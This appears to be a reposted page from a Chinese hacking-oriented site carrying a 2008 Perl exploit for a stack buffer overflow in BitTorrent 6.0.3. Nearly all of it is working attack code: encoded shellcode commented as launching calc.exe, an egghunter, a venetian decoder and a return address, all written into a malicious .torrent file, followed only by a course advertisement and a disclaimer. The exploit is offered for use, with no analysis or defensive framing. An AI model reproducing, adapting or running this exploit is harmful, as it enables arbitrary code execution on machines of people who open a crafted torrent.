黑基网 首页 服务器 Linux 查看内容

BitTorrent 6.0.3 .torrent 文件堆栈缓冲区溢出

2008-10-21 11:02| 投稿: Linux

摘要:   #!/usr/bin/perl  # BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit  # 09/21/2008 by&n...
  #!/usr/bin/perl  # BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit  # 09/21/2008 by  k`sOSe && oVeret  use warnings;  use strict;  # If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder  my $shellcode =  #  windows/exec CMD="C:\WINDOWS\system32\calc.exe"  #[*] x86/alpha_mixed succeeded, final size 337  "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .  "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .  "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .  "\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .  "\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .  "\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .  "\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .  "\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .  "\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .  "\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .  "\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .  "\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .  "\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .  "\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .  "\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .  "\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .  "\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .  "\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .  "\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .  "\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .  "\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .  "\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .  "\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .  "\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .  "\x41";  $shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version )  my $ret  = "\x3f\x41"; # -> unicode friendly pop,pop,ret  # unicode friendly get_EIP (needed by the venetian decoder)  sub get_eip  {  #0041 00          ADD BYTE PTR DS:[ECX],AL  #5F               POP EDI  #0041 00          ADD BYTE PTR DS:[ECX],AL  #5F               POP EDI  #0041 00          ADD BYTE PTR DS:[ECX],AL  #6A 00            PUSH 0  #58               POP EAX  #0041 00          ADD BYTE PTR DS:[ECX],AL  #57               PUSH EDI  #0041 00          ADD BYTE PTR DS:[ECX],AL  #54               PUSH ESP  #0041 00          ADD BYTE PTR DS:[ECX],AL  #5A               POP EDX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #40               INC EAX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #43               INC EBX  #0042 00          ADD BYTE PTR DS:[EDX],AL  #58               POP EAX  #0041 00          ADD BYTE PTR DS:[ECX],AL  "\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41";  }  sub egghunter  {  #6A01    PUSH 1  #5E    POP ESI  #4E    DEC ESI (=0)  #6A72    PUSH 72        <- starts from 0x00720000  #56    PUSH ESI  #4C    DEC ESP  #4C    DEC ESP  #5E    POP ESI  #5E    POP ESI        <- ESI == 0x00720000  #BA21202120  /MOV EDX,20212021    <- egg  #46    |INC ESI  #3B16    |CMP EDX,DWORD PTR DS:[ESI]  #75FB    \JNZ SHORT egghunter  "\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB";  }  # this will decode the unicode expanded shellcode pushing it to the stack and the execute it  sub decoder  {  #46    INC ESI  #6A01    PUSH 1  #6801010155  PUSH 0x55010101  #4C    DEC ESP  #5B    POP EBX  #5B    POP EBX  #AD    /LODS DWORD PTR DS:[ESI]  #50    |PUSH EAX  #44    |INC ESP  #44    |INC ESP  #44    |INC ESP  #4E    |DEC ESI  #4E    |DEC ESI  #4E    |DEC ESI  #4E    |DEC ESI  #4E    |DEC ESI  #4E    |DEC ESI  #4B    |DEC EBX  #83FB01    |CMP EBX,1  #75EF    \JNE SHORT decoder  #54    PUSH ESP  #59    POP ECX  #4C    DEC ESP    -> realign  #51    PUSH ECX  #C3    RET  "\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";  }  # venetian deccoder + venetian encoded egghunter and decoder  sub venetian_decoder  {  "\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".  "\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".  "\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".  "\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".  "\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".  "\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".  "\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".  "\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".  "\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".  "\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".  "\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".  "\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".  "\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".  "\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".  "\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".  "\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".  "\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".  "\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";  }  my $stack_buffer  = $ret x 192 . get_eip() . venetian_decoder();  open(HANDLE, "> torrent.torrent") || die "Error!\n\n";  print HANDLE  "d8:announce17:http://qwerty.qwe7:comment"   .  length($shellcode) .":"       .  $shellcode .  "10:created by"         .  length($stack_buffer) . ":"      .  $stack_buffer          .  "13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".  "\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a";  close (HANDLE);
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部